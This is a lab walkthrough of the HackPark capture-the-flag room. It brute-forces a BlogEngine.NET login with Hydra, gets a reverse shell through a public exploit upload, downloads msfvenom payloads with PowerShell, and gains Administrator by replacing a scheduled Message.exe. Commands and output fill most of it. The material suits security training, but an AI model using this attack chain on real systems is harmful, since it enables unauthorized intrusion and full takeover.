HackPark
Bruteforce a websites login with Hydra, identify and use a public exploit then escalate your privileges on this Windows machine!
Windows CVE RCE Metasploit winPEAS HydraRoom Description
Bruteforce a websites login with Hydra, identify and use a public exploit then escalate your privileges on this Windows machine! Find THM room here
Used Commands
hydra -l <username> -P <path to wordlist> <target ip> http-post-form <payload>
searchsploit <search name>
nc -lvnp <listener port>
python3 -m http.server <webserver port>
msfvenom --list payloads
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<listener ip> LPORT=<listener port> -f exe > shell.exe
msfvenom -p windows/shell_reverse_tcp -a x86 --encoder /x86/shikata_ga_nai LHOST=<listener ip> LPORT=<listener port> -f exe -o <output filename>
msfvenom -p <payload> -a <architecture> --encoder /x86/shikata_ga_nai LHOST=<listener ip> LPORT=<listener port> -f exe -o <output filename>
getuid
powershell -c "Invoke-WebRequest -Uri 'http://<webserver ip>:<webserver port>/<filename>' -OutFile '<output filename>'"
powershell "(New-Object System.Net.WebClient).Downloadfile('http://<webserver ip>:<webserver port>/<filename>','<output filename')"
ren <filename> <new filename>
Task 1
Google:
Who’s the clown?
A quick search on the source of code didn’t give me any hints.
So I searched on google and finally found the name.
Task 2
Find the login page in the menu. This gives us some more knowledge about the used components.
Hydra:
Brute-forcing a password
Before I started using Hydra I did a quick search on google and tried to find some default credentials.
Username | Password |
---|---|
admin | admin |
admin | Passw@rd123 |
Unfortunately, this didn’t work out so let’s continue with Hydra.
hydra -l admin -P /usr/share/wordlists/rockyou.txt <target ip> http-post-form <payload>
Parameter | Description |
---|---|
-l | <username> |
-P | <wordslist> |
<payload> | everything starting from __VIEWSTATE=... to ...LoginButton=Log+in check the following screenshot |
If everything worked you should receive something like this
[80][http-post-form] host: 10.10.9.86 login: admin password: 1qaxxxxx
1 of 1 target successfully completed, 1 valid password found
Burp-Suite:
Brute-forcing a password
Burp-Suites Intruder is another option guessing passwords. The Source code of the login page shows that this login seems to be for an administrator. So I decided to start with “admin” as username and any password wordlist you can find.
You should give it a try.
Burp-Suite:
Request type of login form
Checkout the source code of the webpage or if you used Burp Suite check the request when you try to login with any credentials.
Task 3
Check out the about page from the sidebar to find the current version of BlogEngine
SearchSploit: Find exploits
What is the CVE Version? You will get multiple reports when you search for BlogEngine.NET.
searchsploit BlogEngine.NET
![Result of search with searchsploit](https://www.xuptox.org/docs/tryhackme/hackpark/thm_hackpark_searchsploit_result.png)
3 of them are regarding remote code execution (that’s what we are striving for) but only 1 of them is valid. Go and find the right one or try them all.
Gain a reverse shell
Copy the file to your working directory.
Before we answer the next question we need to gain access to the server. Let’s run that exploit
you will find everything you need to know in the file header
vim 46353.cs
-
Change the
<listener ip>
and<listener port>
-
Setup a netcat listener on that port
nc -lvnp <listener port>
-
Rename exploit file to
PostView.ascx
-
Upload the file on the target server by editing a post (read the description)
http://<target ip>/admin/app/editor/editpost.cshtml
-
Use the browser to access the base URL like so:
http://<target ip>/?theme=../../App_Data/files
whoami
will answer the next question
Who is the web server running as?
![Established reverse shell with running whoami: iis apppool\blog](https://www.xuptox.org/docs/tryhackme/hackpark/thm_exploit_step_4.png)
Task 4 (Metasploit)
Compromise the machine
Let’s create a better shell using msfvenom.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<listener ip> LPORT=9001 -f exe > shell.exe
![Creation of reverse shell executable with msfvenom](https://www.xuptox.org/docs/tryhackme/hackpark/thm_t4_shell_exe.png)
Setup a http.server on the attacker machine. I used python3
and http.server
for this.
python3 -m http.server 8000
Use the existing reverse shell and download the shell.exe
on the victim machine using PowerShell.
powershell "(New-Object System.Net.WebClient).Downloadfile('http://<webserver ip>:8000/shell.exe','shell.exe')"
![python3 webserver on port 8000](https://www.xuptox.org/docs/tryhackme/hackpark/thm_t4_upload_shell_exe.png)
Before executing shell.exe
let’s start Metasploit and setup a meterpreter/reverse_shell_tcp
msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
Check options
and set the required parameters.
set LHOST <atk ip>
set LPORT 9001
run
![Options on metasploit multi/handler with meterpreter/reverse_tcp payload](https://www.xuptox.org/docs/tryhackme/hackpark/thm_t4_multi_handler.png)
Use run
to start the listener. If everything is correct you should now see a message like this:
[*] Started reverse TCP handler on 10.10.219.52:9001
Run shell.exe
on the victim machine
shell.exe
![Incoming connection from target](https://www.xuptox.org/docs/tryhackme/hackpark/thm_t4_multi_handler_get_session.png)
What’s the OS version?
As soon as you are connected with the new meterpreter shell, run sysinfo
to get the OS version.
WinPEAS:
Enumeration
If you do not have WinPEAS already stored on your machine, you can do this now. A quick search on google will give you all the information you need.
Use the same method as used in the last step to get winPEAS.bat transferred to the target machine.
![Switch to meterpreter shell](https://www.xuptox.org/docs/tryhackme/hackpark/thm_t4_upload_winPEAS_1.png)
powershell "(New-Object System.Net.WebClient).Downloadfile('http://<webserver ip>:8000/winPEAS.bat','winPEAS.bat')"
![List of files in temp folder](https://www.xuptox.org/docs/tryhackme/hackpark/thm_t4_upload_winPEAS_2.png)
Run winPEAS.bat
Any suspicious service running?
Have a look at the output of winPEAS (RUNNING PROCESSES
is what we are searching for)
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] RUNNING PROCESSES <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
[i] Something unexpected is running? Check for vulnerabilities
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#running-processes
Image Name PID Services
========================= ======== ============================================
System Idle Process 0 N/A
System 4 N/A
smss.exe 376 N/A
csrss.exe 524 N/A
csrss.exe 580 N/A
wininit.exe 588 N/A
winlogon.exe 616 N/A
services.exe 680 N/A
lsass.exe 688 SamSs
svchost.exe 748 BrokerInfrastructure, DcomLaunch, LSM,
PlugPlay, Power, SystemEventsBroker
svchost.exe 792 RpcEptMapper, RpcSs
dwm.exe 872 N/A
svchost.exe 888 Dhcp, EventLog, lmhosts, Wcmsvc
svchost.exe 916 AeLookupSvc, CertPropSvc, DsmSvc, gpsvc,
iphlpsvc, LanmanServer, ProfSvc, Schedule,
SENS, SessionEnv, ShellHWDetection, Themes,
Winmgmt
svchost.exe 972 EventSystem, FontCache, netprofm, nsi,
W32Time, WinHttpAutoProxySvc
svchost.exe 360 CryptSvc, Dnscache, LanmanWorkstation,
NlaSvc, WinRM
svchost.exe 848 BFE, DPS, MpsSvc
spoolsv.exe 1148 Spooler
amazon-ssm-agent.exe 1180 AmazonSSMAgent
svchost.exe 1256 AppHostSvc
LiteAgent.exe 1276 AWSLiteAgent
svchost.exe 1372 TrkWks, UALSVC, UmRdpService
svchost.exe 1388 W3SVC, WAS
WService.exe 1416 WindowsScheduler
WScheduler.exe 1556 N/A
Ec2Config.exe 1656 Ec2Config
WmiPrvSE.exe 1748 N/A
svchost.exe 1432 TermService
taskhostex.exe 2584 N/A
explorer.exe 2656 N/A
ServerManager.exe 2360 N/A
WScheduler.exe 1804 N/A
msdtc.exe 1888 MSDTC
w3wp.exe 2520 N/A
cmd.exe 1564 N/A
conhost.exe 2116 N/A
shell.exe 1860 N/A
cmd.exe 2132 N/A
conhost.exe 924 N/A
WmiPrvSE.exe 1864 N/A
TrustedInstaller.exe 1948 TrustedInstaller
TiWorker.exe 1356 N/A
tasklist.exe 2668 N/A
Head over to the SystemScheduler
folder.
cd "c:\Program Files (x86)\SystemScheduler"
Check out the read, write, execute permissions! That looks great!
meterpreter > ls
Listing: c:\Program Files (x86)\SystemScheduler
===============================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 4096 dir 2019-08-04 11:36:53 +0000 Events
100666/rw-rw-rw- 60 fil 2019-08-04 11:36:42 +0000 Forum.url
100666/rw-rw-rw- 9813 fil 2019-08-04 11:36:42 +0000 License.txt
100666/rw-rw-rw- 1496 fil 2019-08-04 11:37:02 +0000 LogFile.txt
100666/rw-rw-rw- 3760 fil 2019-08-04 11:36:53 +0000 LogfileAdvanced.txt
100777/rwxrwxrwx 536992 fil 2019-08-04 11:36:42 +0000 Message.exe
100777/rwxrwxrwx 445344 fil 2019-08-04 11:36:42 +0000 PlaySound.exe
100777/rwxrwxrwx 27040 fil 2019-08-04 11:36:42 +0000 PlayWAV.exe
100666/rw-rw-rw- 149 fil 2019-08-04 11:36:53 +0000 Preferences.ini
100777/rwxrwxrwx 485792 fil 2019-08-04 11:36:42 +0000 Privilege.exe
100666/rw-rw-rw- 10100 fil 2019-08-04 11:36:42 +0000 ReadMe.txt
100777/rwxrwxrwx 112544 fil 2019-08-04 11:36:42 +0000 RunNow.exe
100777/rwxrwxrwx 235936 fil 2019-08-04 11:36:42 +0000 SSAdmin.exe
100777/rwxrwxrwx 731552 fil 2019-08-04 11:36:42 +0000 SSCmd.exe
100777/rwxrwxrwx 456608 fil 2019-08-04 11:36:42 +0000 SSMail.exe
100777/rwxrwxrwx 1633696 fil 2019-08-04 11:36:42 +0000 Scheduler.exe
100777/rwxrwxrwx 491936 fil 2019-08-04 11:36:42 +0000 SendKeysHelper.exe
100777/rwxrwxrwx 437664 fil 2019-08-04 11:36:42 +0000 ShowXY.exe
100777/rwxrwxrwx 439712 fil 2019-08-04 11:36:42 +0000 ShutdownGUI.exe
100666/rw-rw-rw- 785042 fil 2019-08-04 11:36:42 +0000 WSCHEDULER.CHM
100666/rw-rw-rw- 703081 fil 2019-08-04 11:36:42 +0000 WSCHEDULER.HLP
100777/rwxrwxrwx 136096 fil 2019-08-04 11:36:42 +0000 WSCtrl.exe
100777/rwxrwxrwx 68512 fil 2019-08-04 11:36:42 +0000 WSLogon.exe
100666/rw-rw-rw- 33184 fil 2019-08-04 11:36:42 +0000 WSProc.dll
100666/rw-rw-rw- 2026 fil 2019-08-04 11:36:42 +0000 WScheduler.cnt
100777/rwxrwxrwx 331168 fil 2019-08-04 11:36:42 +0000 WScheduler.exe
100777/rwxrwxrwx 98720 fil 2019-08-04 11:36:42 +0000 WService.exe
100666/rw-rw-rw- 54 fil 2019-08-04 11:36:42 +0000 Website.url
100777/rwxrwxrwx 76704 fil 2019-08-04 11:36:42 +0000 WhoAmI.exe
100666/rw-rw-rw- 1150 fil 2019-08-04 11:36:42 +0000 alarmclock.ico
100666/rw-rw-rw- 766 fil 2019-08-04 11:36:42 +0000 clock.ico
100666/rw-rw-rw- 80856 fil 2019-08-04 11:36:42 +0000 ding.wav
100666/rw-rw-rw- 1637972 fil 2019-08-04 11:36:42 +0000 libeay32.dll
100777/rwxrwxrwx 40352 fil 2019-08-04 11:36:42 +0000 sc32.exe
100666/rw-rw-rw- 766 fil 2019-08-04 11:36:42 +0000 schedule.ico
100666/rw-rw-rw- 355446 fil 2019-08-04 11:36:42 +0000 ssleay32.dll
100666/rw-rw-rw- 6999 fil 2019-08-04 11:36:42 +0000 unins000.dat
100777/rwxrwxrwx 722597 fil 2019-08-04 11:36:42 +0000 unins000.exe
100666/rw-rw-rw- 6574 fil 2019-08-04 11:36:42 +0000 whiteclock.ico
Let’s dig deeper into Events
folder and check some log files.
meterpreter > cd Events
meterpreter > ls
Listing: c:\Program Files (x86)\SystemScheduler\Events
======================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 1926 fil 2019-08-04 22:05:19 +0000 20198415519.INI
100666/rw-rw-rw- 27140 fil 2019-08-04 22:06:01 +0000 20198415519.INI_LOG.txt
100666/rw-rw-rw- 290 fil 2020-10-02 21:50:12 +0000 2020102145012.INI
100666/rw-rw-rw- 186 fil 2021-04-18 10:02:05 +0000 Administrator.flg
100666/rw-rw-rw- 182 fil 2021-04-18 10:01:36 +0000 SYSTEM_svc.flg
100666/rw-rw-rw- 0 fil 2021-04-18 10:02:05 +0000 Scheduler.flg
100666/rw-rw-rw- 449 fil 2019-08-04 11:36:53 +0000 SessionInfo.flg
100666/rw-rw-rw- 0 fil 2021-04-18 10:01:36 +0000 service.flg
While you check the log files you will find this:
meterpreter > cat 20198415519.INI_LOG.txt
...
04/18/21 04:13:34,Process Ended. PID:2376,ExitCode:4,Message.exe (Administrator)
04/18/21 04:14:01,Event Started Ok, (Administrator)
04/18/21 04:14:34,Process Ended. PID:2880,ExitCode:4,Message.exe (Administrator)
04/18/21 04:15:01,Event Started Ok, (Administrator)
04/18/21 04:15:33,Process Ended. PID:2604,ExitCode:4,Message.exe (Administrator)
04/18/21 04:16:01,Event Started Ok, (Administrator)
04/18/21 04:16:33,Process Ended. PID:2556,ExitCode:4,Message.exe (Administrator)
04/18/21 04:17:00,Event Started Ok, (Administrator)
04/18/21 04:17:34,Process Ended. PID:2400,ExitCode:4,Message.exe (Administrator)
04/18/21 04:18:01,Event Started Ok, (Administrator)
04/18/21 04:18:34,Process Ended. PID:2956,ExitCode:4,Message.exe (Administrator)
04/18/21 04:19:01,Event Started Ok, (Administrator)
meterpreter >
There is a service running every 30 seconds. Check the user. Great! Let’s get root now.
Root the machine
Replace Message.exe with our renamed shell.exe Use the python webserver setup earlier to download the shell into the SystemScheduler folder.
meterpreter > shell
Process 2628 created.
Channel 8 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
c:\Program Files (x86)\SystemScheduler>powershell -c "Invoke-WebRequest -Uri 'http://<webserver ip>:8000/shell.exe' -OutFile 'c:\Program Files (x86)\SystemScheduler\shell.exe'"
In Metasploit:
- Background the current channel
c:\Program Files (x86)\SystemScheduler>^Z
Background channel 8? [y/N] y
meterpreter > pwd
c:\Program Files (x86)\SystemScheduler
- Rename Message.exe to Message.exe.bak
meterpreter > mv Message.exe Message.exe.bak
- Rename shell.exe to Message.exe
meterpreter > mv shell.exe Message.exe
- Background the current session
ctrl + z
and run the previousmulti/handler
again
meterpreter >
Background session 1? [y/N] y
[-] Unknown command: y.
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.219.52:9001
Within 30 seconds WindowsScheduler will run Message.exe
that was replaced by our venomous shell.exe
.
As the task is executed as Administrator
a reverse shell with corresponding permissions will be established.
[*] Sending stage (176195 bytes) to 10.10.75.91
[*] Meterpreter session 2 opened (10.10.219.52:9001 -> 10.10.75.91:49304) at 2021-04-18 11:30:01 +0000
meterpreter > getuid
Server username: HACKPARK\Administrator
Congrats! You have root.
Task 5 (w/o Metasploit)
Use the same exploit to gain an initial reverse shell. Setup a netcat listener nc -lvnp 4445
.
root@kali:~/Desktop/HackPark# nc -lvnp 4445
listening on [any] 4445 ...
Use the browser to establish the initial reverse shell. http://<target ip>/admin/app/editor/editpost.cshtml
listening on [any] 4445 ...
connect to [10.10.219.52] from (UNKNOWN) [10.10.75.91] 49313
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
Compromise the machine
The target is to root by using windows/shell_reverse_tcp
(instead of meterpreter which was used in Task 4).
Create a venomous shell.exe
with a different payload.
root@kali:~/Desktop/HackPark# msfvenom -p windows/shell_reverse_tcp -a x86 --encoder /x86/shikata_ga_nai LHOST=10.10.219.52 LPORT=9001 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] Skipping invalid encoder /x86/shikata_ga_nai
[!] Couldn't find encoder to use
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: shell.exe
Move the file to target A simple http.server will serve for this
On your attacker machine:
root@kali:~/Desktop/HackPark# python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Root the machine
Switch to the victim’s machine and change the current directory to c:\Program Files (x86)\SystemScheduler
.
cd c:\Program Files (x86)\SystemScheduler
Download generated shell.exe
and winPEAS.bat
onto the victim machine.
powershell -c "Invoke-WebRequest -Uri 'http://<webserver ip>:8000/shell.exe' -OutFile 'shell.exe'"
powershell -c "Invoke-WebRequest -Uri 'http://<webserver ip>:8000/winPEAS.bat' -OutFile 'winPEAS.bat'"
Start a netcat listener on your machine. For better stability, I used rlwrap
around.
root@kali:~/Desktop/HackPark# rlwrap nc -lvnp 9001
listening on [any] 9001 ...
Rename Message.exe
ren "Message.exe" "Message.exe.bak"
c:\Program Files (x86)\SystemScheduler>ren "Message.exe" "Message.exe.bak"
Finally, rename the uploaded shell.exe on the target machine to Message.exe
ren "shell.exe" "Message.exe"
c:\Program Files (x86)\SystemScheduler>ren "shell.exe" "Message.exe"
Wait for WindowsScheduler to run our new Message.exe
root@kali:~# rlwrap nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.219.52] from (UNKNOWN) [10.10.181.219] 49214
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\PROGRA~2\SYSTEM~1>echo %username%
echo %username%
Administrator
Congrats! You have root.